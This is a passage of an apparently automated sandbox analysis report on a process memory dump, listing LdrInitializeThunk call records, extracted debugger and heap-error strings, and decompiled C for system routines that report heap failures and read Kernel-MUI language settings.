                                                                            • Instruction Fuzzy Hash: 0F90027160100402D50565D966086460005A7E0341F51D015A5015559EC7E588917171
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F978A
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: eb04b1d59912049d0041b43981a53974c69542ae562f15913f7d90426611401c
                                                                            • Instruction ID: 2ddf1da5be036aaa7ab78c0894adc860af4ac6471e52a2f9e8fe41a8635ad593
                                                                            • Opcode Fuzzy Hash: eb04b1d59912049d0041b43981a53974c69542ae562f15913f7d90426611401c
                                                                            • Instruction Fuzzy Hash: 8090027961300002D58571D9660860A0005A7D1342F91D419A000655CCCAD588696361
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F97AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 6b88498f1a6ad8df49e8bd186f8944e2ebe410dbebea146153cb51c9850f1f7a
                                                                            • Instruction ID: 99567f19d8ff02331ab08ad1ac29ce06fc1cd0fc7bf732713824fcea3f9ddb8f
                                                                            • Opcode Fuzzy Hash: 6b88498f1a6ad8df49e8bd186f8944e2ebe410dbebea146153cb51c9850f1f7a
                                                                            • Instruction Fuzzy Hash: E790027170100003D54571D966186064005F7E1341F51D015E0405558CDAD588566262
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F9FEA
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 96eab8f2331156addbe6b6a5f6e38e7a7957547c2a10f054a37cbceaf74e250f
                                                                            • Instruction ID: f1ad5182df541f9e4de8a74b4f3b0a960598465730aa2632b35eda3e7bc0384e
                                                                            • Opcode Fuzzy Hash: 96eab8f2331156addbe6b6a5f6e38e7a7957547c2a10f054a37cbceaf74e250f
                                                                            • Instruction Fuzzy Hash: 5790027171114402D51561D996047060005A7D1341F51C415A081555CDC7D588917162
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F9A0A
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 6312dc9d86751c55430c2eff1505241c6498c6d8b143a8f03d4da1bcc747527a
                                                                            • Instruction ID: 237fc09feb6f535907aee1aa9db64dd4a9a3cc92b0d28313b6ee670c61450b88
                                                                            • Opcode Fuzzy Hash: 6312dc9d86751c55430c2eff1505241c6498c6d8b143a8f03d4da1bcc747527a
                                                                            • Instruction Fuzzy Hash: B990027160140402D50561D95A1470B0005A7D0342F51C015A1155559DC7E5885175B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F9A2A
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 2f4c3fc75c87b8b2d67dd8291fa5e6d3b515325cc8c2cfed96653a01a7aa56bf
                                                                            • Instruction ID: 132870921965155216ed62baad54e00de34344280f271b39aa2e93e3b7663e54
                                                                            • Opcode Fuzzy Hash: 2f4c3fc75c87b8b2d67dd8291fa5e6d3b515325cc8c2cfed96653a01a7aa56bf
                                                                            • Instruction Fuzzy Hash: E2900271A0100042454571E99A449064005BBE1351751C125A0989554DC6D9886566A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F9A5A
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c509421b81adfde94b524689cee8de9417b4c9d25b269558399c21100d0ae8ac
                                                                            • Instruction ID: f687567509220d6472929e8fa923be0f77c1fde09609f50bd035caf3a21340c5
                                                                            • Opcode Fuzzy Hash: c509421b81adfde94b524689cee8de9417b4c9d25b269558399c21100d0ae8ac
                                                                            • Instruction Fuzzy Hash: 9E90027161180042D60565E95E14B070005A7D0343F51C119A0145558CCAD588616561
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F966A
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d1da726b3211757d10a6c261e05a6945b3b92d5b0aa76a12ff2cc0c141f55dd2
                                                                            • Instruction ID: 7b3aa78926149baec460cf22497976ad43f66a22c1fcca9d860c5295394e9c30
                                                                            • Opcode Fuzzy Hash: d1da726b3211757d10a6c261e05a6945b3b92d5b0aa76a12ff2cc0c141f55dd2
                                                                            • Instruction Fuzzy Hash: F790027160100802D58571D9560464A0005A7D1341F91C019A0016658DCBD58A5977E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F96EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: abe3bb2be54b12107b4e25728a62721550012e299fea4fe33af66f4f8c5d84b4
                                                                            • Instruction ID: 6d695e16418302ebb9531eab95ecc135a76dc941f60381eff3f7fb45b2003605
                                                                            • Opcode Fuzzy Hash: abe3bb2be54b12107b4e25728a62721550012e299fea4fe33af66f4f8c5d84b4
                                                                            • Instruction Fuzzy Hash: 8F90027160108802D51561D9960474A0005A7D0341F55C415A441565CDC7D588917161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL ref: 010F9694
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 238c062a9c01c46bf21b1b6adff751b25c3bf8e46bb6e2d85196a422652fc815
                                                                            • Instruction ID: dede3da8d8a84dffb8c40c52cc24b8d6d3e285f2b6b5d455bb821104c0c54926
                                                                            • Opcode Fuzzy Hash: 238c062a9c01c46bf21b1b6adff751b25c3bf8e46bb6e2d85196a422652fc815
                                                                            • Instruction Fuzzy Hash: 85B09B71D014C5C5DA56D7E557087177A407BD4745F16C055E2420685B87B8C091F5B5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Strings
                                                                            • *** Inpage error in %ws:%s , xrefs: 0116B418
                                                                            • *** then kb to get the faulting stack , xrefs: 0116B51C
                                                                            • write to , xrefs: 0116B4A6
                                                                            • The resource is owned shared by %d threads , xrefs: 0116B37E
                                                                            • *** Critical Section Timeout (%p) in %ws:%s , xrefs: 0116B39B
                                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked. , xrefs: 0116B305
                                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s) , xrefs: 0116B53F
                                                                            • The instruction at %p referenced memory at %p. , xrefs: 0116B432
                                                                            • The critical section is owned by thread %p. , xrefs: 0116B3B9
                                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s , xrefs: 0116B2DC
                                                                            • If this bug ends up in the shipping product, it could be a severe security hole. , xrefs: 0116B314
                                                                            • This failed because of error %Ix. , xrefs: 0116B446
                                                                            • This means that the I/O device reported an I/O error. Check your hardware. , xrefs: 0116B476
                                                                            • *** An Access Violation occurred in %ws:%s , xrefs: 0116B48F
                                                                            • <unknown> , xrefs: 0116B27E, 0116B2D1, 0116B350, 0116B399, 0116B417, 0116B48E
                                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure , xrefs: 0116B38F
                                                                            • Go determine why that thread has not released the critical section. , xrefs: 0116B3C5
                                                                            • *** A stack buffer overrun occurred in %ws:%s , xrefs: 0116B2F3
                                                                            • *** Resource timeout (%p) in %ws:%s , xrefs: 0116B352
                                                                            • an invalid address, %p , xrefs: 0116B4CF
                                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure). , xrefs: 0116B323
                                                                            • read from , xrefs: 0116B4AD, 0116B4B2
                                                                            • *** enter .cxr %p for the context , xrefs: 0116B50D
                                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware. , xrefs: 0116B47D
                                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used. , xrefs: 0116B484
                                                                            • *** enter .exr %p for the exception record , xrefs: 0116B4F1
                                                                            • The resource is owned exclusively by thread %p , xrefs: 0116B374
                                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure , xrefs: 0116B3D6
                                                                            • a NULL pointer , xrefs: 0116B4E0
                                                                            • The instruction at %p tried to %s , xrefs: 0116B4B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                            • API String ID: 0-108210295
                                                                            • Opcode ID: db93ac31f77e2dd09008d53b1ba92578ad6bfd58eefe517a1b1d5c93301cb9bf
                                                                            • Instruction ID: 9fa9afd322e9e80fd9be109e49adcf362aeab08a2cb36010f75355080cde0e40
                                                                            • Opcode Fuzzy Hash: db93ac31f77e2dd09008d53b1ba92578ad6bfd58eefe517a1b1d5c93301cb9bf
                                                                            • Instruction Fuzzy Hash: E1812731B48210FFDB2DAB8ACC45DBB3B2AEF56B96F810058F5059F112D3628461C7B6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 44%
E01171C06() {
    signed int _t27;
    char* _t104;
    char* _t105;
    intOrPtr _t113;
    intOrPtr _t115;
    intOrPtr _t117;
    intOrPtr _t119;
    intOrPtr _t120;

    _t105 = 0x10948a4;
    _t104 = "HEAP: ";
    if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
        _push(_t104);
        E010BB150();
    } else {
        E010BB150("HEAP[%wZ]: ", *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
    }
    _push( *0x11a589c);
    E010BB150("Heap error detected at %p (heap handle %p)\n", *0x11a58a0);
    _t27 = *0x11a5898; // 0x0
    if(_t27 <= 0xf) {
        switch( *((intOrPtr*)(_t27 * 4 + &M01171E96))) {
            case 0:
                _t105 = "heap_failure_internal";
                goto L21;
            case 1:
                goto L21;
            case 2:
                goto L21;
            case 3:
                goto L21;
            case 4:
                goto L21;
            case 5:
                goto L21;
            case 6:
                goto L21;
            case 7:
                goto L21;
            case 8:
                goto L21;
            case 9:
                goto L21;
            case 0xa:
                goto L21;
            case 0xb:
                goto L21;
            case 0xc:
                goto L21;
            case 0xd:
                goto L21;
            case 0xe:
                goto L21;
            case 0xf:
                goto L21;
        }
    }
    L21:
    if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
        _push(_t104);
        E010BB150();
    } else {
        E010BB150("HEAP[%wZ]: ", *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
    }
    _push(_t105);
    E010BB150("Error code: %d - %s\n", *0x11a5898);
    _t113 = *0x11a58a4; // 0x0
    if(_t113 != 0) {
        if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
            _push(_t104);
            E010BB150();
        } else {
            E010BB150("HEAP[%wZ]: ", *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
        }
        E010BB150("Parameter1: %p\n", *0x11a58a4);
    }
    _t115 = *0x11a58a8; // 0x0
    if(_t115 != 0) {
        if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
            _push(_t104);
            E010BB150();
        } else {
            E010BB150("HEAP[%wZ]: ", *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
        }
        E010BB150("Parameter2: %p\n", *0x11a58a8);
    }
    _t117 = *0x11a58ac; // 0x0
    if(_t117 != 0) {
        if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
            _push(_t104);
            E010BB150();
        } else {
            E010BB150("HEAP[%wZ]: ", *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
        }
        E010BB150("Parameter3: %p\n", *0x11a58ac);
    }
    _t119 = *0x11a58b0; // 0x0
    if(_t119 != 0) {
        L41:
        if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
            _push(_t104);
            E010BB150();
        } else {
            E010BB150("HEAP[%wZ]: ", *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
        }
        _push( *0x11a58b4);
        E010BB150("Last known valid blocks: before - %p, after - %p\n", *0x11a58b0);
    } else {
        _t120 = *0x11a58b4; // 0x0
        if(_t120 != 0) {
            goto L41;
        }
    }
    if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
        _push(_t104);
        E010BB150();
    } else {
        E010BB150("HEAP[%wZ]: ", *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
    }
    return E010BB150("Stack trace available at %p\n", 0x11a58c0);
}

                                                                            Strings
                                                                            • Last known valid blocks: before - %p, after - %p , xrefs: 01171E45
                                                                            • Parameter3: %p , xrefs: 01171DEE
                                                                            • HEAP[%wZ]: , xrefs: 01171C30, 01171CF7, 01171D42, 01171D8B, 01171DD4, 01171E25, 01171E6D
                                                                            • Error code: %d - %s , xrefs: 01171D12
                                                                            • heap_failure_freelists_corruption , xrefs: 01171CC9
                                                                            • HEAP: , xrefs: 01171C16, 01171C3D, 01171D04, 01171D4F, 01171D98, 01171DE1, 01171E32, 01171E7A
                                                                            • Stack trace available at %p , xrefs: 01171E86
                                                                            • heap_failure_invalid_argument , xrefs: 01171CAD
                                                                            • Parameter1: %p , xrefs: 01171D5C
                                                                            • heap_failure_internal , xrefs: 01171C6E
                                                                            • Parameter2: %p , xrefs: 01171DA5
                                                                            • heap_failure_buffer_overrun , xrefs: 01171C98
                                                                            • heap_failure_unknown , xrefs: 01171C75
                                                                            • Heap error detected at %p (heap handle %p) , xrefs: 01171C50
                                                                            • heap_failure_entry_corruption , xrefs: 01171C83
                                                                            • heap_failure_invalid_allocation_type , xrefs: 01171CB4
                                                                            • heap_failure_usage_after_free , xrefs: 01171CBB
                                                                            • heap_failure_listentry_corruption , xrefs: 01171CD0
                                                                            • heap_failure_cross_heap_operation , xrefs: 01171CC2
                                                                            • heap_failure_buffer_underrun , xrefs: 01171C9F
                                                                            • heap_failure_lfh_bitmap_mismatch , xrefs: 01171CD7
                                                                            • heap_failure_multiple_entries_corruption , xrefs: 01171C8A
                                                                            • heap_failure_virtual_block_corruption , xrefs: 01171C91
                                                                            • heap_failure_generic , xrefs: 01171C7C
                                                                            • heap_failure_block_not_busy , xrefs: 01171CA6
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                            • API String ID: 0-2897834094
                                                                            • Opcode ID: afd663469d0ddbaae865c273275ce5d4b8eb5dacd9e3687b4c4cc6783ee86bf0
                                                                            • Instruction ID: 77767ab52b75f3e53c590baa358a13f09f4292d1bd9eb5528b1371dd471879ac
                                                                            • Opcode Fuzzy Hash: afd663469d0ddbaae865c273275ce5d4b8eb5dacd9e3687b4c4cc6783ee86bf0
                                                                            • Instruction Fuzzy Hash: 09610332524141EFD72DABCAD488E6477B9EB14970BCA843EF9895F301DB349C808F4A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 96%
                                                                                                                                  E010C3D34(signed int* __ecx) { 				signed int* _v8; 				char _v12; 				signed int* _v16; 				signed int* _v20; 				char _v24; 				signed int _v28; 				signed int _v32; 				char _v36; 				signed int _v40; 				signed int _v44; 				signed int* _v48; 				signed int* _v52; 				signed int _v56; 				signed int _v60; 				char _v68; 				signed int _t140; 				signed int _t161; 				signed int* _t236; 				signed int* _t242; 				signed int* _t243; 				signed int* _t244; 				signed int* _t245; 				signed int _t255; 				void* _t257; 				signed int _t260; 				void* _t262; 				signed int _t264; 				void* _t267; 				signed int _t275; 				signed int* _t276; 				short* _t277; 				signed int* _t278; 				signed int* _t279; 				signed int* _t280; 				short* _t281; 				signed int* _t282; 				short* _t283; 				signed int* _t284; 				void* _t285;  				_v60 = _v60 | 0xffffffff; 				_t280 = 0; 				_t242 = __ecx; 				_v52 = __ecx; 				_v8 = 0; 				_v20 = 0; 				_v40 = 0; 				_v28 = 0; 				_v32 = 0; 				_v44 = 0; 				_v56 = 0; 				_t275 = 0; 				_v16 = 0; 				if(__ecx == 0) { 					_t280 = 0xc000000d; 					_t140 = 0; 					L50: 					 *_t242 =  *_t242 | 0x00000800; 					_t242[0x13] = _t140; 					_t242[0x16] = _v40; 					_t242[0x18] = _v28; 					_t242[0x14] = _v32; 					_t242[0x17] = _t275; 					_t242[0x15] = _v44; 					_t242[0x11] = _v56; 					_t242[0x12] = _v60; 					return _t280; 				} 				if(E010C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) { 					_v56 = 1; 					if(_v8 != 0) { 						L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8); 					} 					_v8 = _t280; 				} 				if(E010C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) { 					_v60 =  *_v8; 					L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8); 					_v8 = _t280; 				} 				if(E010C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) { 					L16: 					
if(E010C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) { 						L28: 						if(E010C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) { 							L46: 							_t275 = _v16; 							L47: 							_t161 = 0; 							L48: 							if(_v8 != 0) { 								L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8); 							} 							_t140 = _v20; 							if(_t140 != 0) { 								if(_t275 != 0) { 									L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275); 									_t275 = 0; 									_v28 = 0; 									_t140 = _v20; 								} 							} 							goto L50; 						} 						_t167 = _v12; 						_t255 = _v12 + 4; 						_v44 = _t255; 						if(_t255 == 0) { 							_t276 = _t280; 							_v32 = _t280; 						} else { 							_t276 = L010D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255); 							_t167 = _v12; 							_v32 = _t276; 						} 						if(_t276 == 0) { 							_v44 = _t280; 							_t280 = 0xc0000017; 							goto L46; 						} else { 							E010FF3E0(_t276, _v8, _t167); 							_v48 = _t276; 							_t277 = E01101370(_t276, 0x1094e90); 							_pop(_t257); 							if(_t277 == 0) { 								L38: 								_t170 = _v48; 								if( *_v48 != 0) { 									E010FBB40(0,  &_v68, _t170); 									if(L010C43C0( &_v68,  &_v24) != 0) { 										_t280 =  &(_t280[0]); 									} 								} 								if(_t280 == 0) { 									_t280 = 0; 									L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32); 									_v44 = 0; 									_v32 = 0; 								} else { 									_t280 = 0; 								} 								_t174 = _v8; 								if(_v8 != 0) { 									L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174); 								} 								_v8 = _t280; 								goto L46; 							} 							_t243 = _v48; 							do { 								 *_t277 = 0; 								_t278 = _t277 + 2; 								E010FBB40(_t257,  &_v68, _t243); 								if(L010C43C0( &_v68,  &_v24) != 0) { 									_t280 =  &(_t280[0]); 								} 								_t243 = _t278; 								_t277 = E01101370(_t278, 0x1094e90); 								_pop(_t257); 							} while (_t277 != 0); 
							_v48 = _t243; 							_t242 = _v52; 							goto L38; 						} 					} 					_t191 = _v12; 					_t260 = _v12 + 4; 					_v28 = _t260; 					if(_t260 == 0) { 						_t275 = _t280; 						_v16 = _t280; 					} else { 						_t275 = L010D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260); 						_t191 = _v12; 						_v16 = _t275; 					} 					if(_t275 == 0) { 						_v28 = _t280; 						_t280 = 0xc0000017; 						goto L47; 					} else { 						E010FF3E0(_t275, _v8, _t191); 						_t285 = _t285 + 0xc; 						_v48 = _t275; 						_t279 = _t280; 						_t281 = E01101370(_v16, 0x1094e90); 						_pop(_t262); 						if(_t281 != 0) { 							_t244 = _v48; 							do { 								 *_t281 = 0; 								_t282 = _t281 + 2; 								E010FBB40(_t262,  &_v68, _t244); 								if(L010C43C0( &_v68,  &_v24) != 0) { 									_t279 =  &(_t279[0]); 								} 								_t244 = _t282; 								_t281 = E01101370(_t282, 0x1094e90); 								_pop(_t262); 							} while (_t281 != 0); 							_v48 = _t244; 							_t242 = _v52; 						} 						_t201 = _v48; 						_t280 = 0; 						if( *_v48 != 0) { 							E010FBB40(_t262,  &_v68, _t201); 							if(L010C43C0( &_v68,  &_v24) != 0) { 								_t279 =  &(_t279[0]); 							} 						} 						if(_t279 == 0) { 							L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16); 							_v28 = _t280; 							_v16 = _t280; 						} 						_t202 = _v8; 						if(_v8 != 0) { 							L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202); 						} 						_v8 = _t280; 						goto L28; 					} 				} 				_t214 = _v12; 				_t264 = _v12 + 4; 				_v40 = _t264; 				if(_t264 == 0) { 					_v20 = _t280; 				} else { 					_t236 = L010D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264); 					_t280 = _t236; 					_v20 = _t236; 					_t214 = _v12; 				} 				if(_t280 == 0) { 					_t161 = 0; 					_t280 = 0xc0000017; 					_v40 = 0; 					goto L48; 				} else { 					E010FF3E0(_t280, _v8, _t214); 					_t285 = _t285 + 0xc; 					_v48 = _t280; 					_t283 = E01101370(_t280, 0x1094e90); 					_pop(_t267); 				
	if(_t283 != 0) { 						_t245 = _v48; 						do { 							 *_t283 = 0; 							_t284 = _t283 + 2; 							E010FBB40(_t267,  &_v68, _t245); 							if(L010C43C0( &_v68,  &_v24) != 0) { 								_t275 = _t275 + 1; 							} 							_t245 = _t284; 							_t283 = E01101370(_t284, 0x1094e90); 							_pop(_t267); 						} while (_t283 != 0); 						_v48 = _t245; 						_t242 = _v52; 					} 					_t224 = _v48; 					_t280 = 0; 					if( *_v48 != 0) { 						E010FBB40(_t267,  &_v68, _t224); 						if(L010C43C0( &_v68,  &_v24) != 0) { 							_t275 = _t275 + 1; 						} 					} 					if(_t275 == 0) { 						L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20); 						_v40 = _t280; 						_v20 = _t280; 					} 					_t225 = _v8; 					if(_v8 != 0) { 						L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225); 					} 					_v8 = _t280; 					goto L16; 				} 			}                        

                                                                            0x011182a3
                                                                            0x010c3e58
                                                                            0x010c3e60
                                                                            0x010c3e6f
                                                                            0x010c3e74
                                                                            0x010c3e77
                                                                            0x010c3e77
                                                                            0x010c3e7a
                                                                            0x010c3e7f
                                                                            0x010c3e8c
                                                                            0x010c3e8c
                                                                            0x010c3e91
                                                                            0x00000000
                                                                            0x010c3e91

                                                                            Strings
                                                                            • WindowsExcludedProcs , xrefs: 010C3D6F
                                                                            • Kernel-MUI-Number-Allowed , xrefs: 010C3D8C
                                                                            • Kernel-MUI-Language-Disallowed , xrefs: 010C3E97
                                                                            • Kernel-MUI-Language-Allowed , xrefs: 010C3DC0
                                                                            • Kernel-MUI-Language-SKU , xrefs: 010C3F70
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
